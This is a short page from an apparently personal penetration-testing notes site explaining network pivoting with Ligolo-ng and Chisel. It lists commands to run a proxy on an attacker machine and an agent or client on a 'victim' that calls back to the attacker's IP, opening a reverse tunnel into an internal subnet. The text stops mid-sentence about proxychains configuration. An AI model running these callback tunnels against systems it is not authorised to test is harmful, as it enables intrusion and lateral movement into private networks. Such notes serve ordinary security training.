Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
  • CVEs
    • Simplehelp CVE-2024-57727
    • Next.js CVE-2025-29927
Powered by GitBook
On this page
  • Ligolo-ng
  • Chisel
  1. Windows Privilege Escalation

Tunneling and Pivoting

PreviousDocker Container EscapeNextMethodology

Last updated 3 months ago

Ligolo-ng

Ligolo makes a tunnel just like a VPN; there is no need to use proxychains

  1. Download Agent and Proxy from Ligolo Github Page

  2. Agent will Run on Victim Machine and Proxy Will run on Attacker Machine (Kali-Linux)

Before Running agents and Proxy you need to run 2 commands on your kali linux

# These commands will set the ligolo interface on your kali linux

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

Then We need to run the Proxy

ligolo-linux-proxy -selfcert -laddr 0.0.0.0:443

after that upload the Agent on the Targer machine and run the below command

./lin-agent -connect 10.8.5.85:11601 -ignore-cert

After that, you need to add the route

sudo ip route add 172.18.0.0/24 dev ligolo

then

start

Chisel

We can use chisel as well for tunneling, 

chisel server -p 1234 --reverse # Run on kali linux (Attacker Machine)
./chisel-linux client 10.8.5.85:1234 R:socks # Run on Victim Machine

for this to work your /etc/proxychains4.conf file should have following entry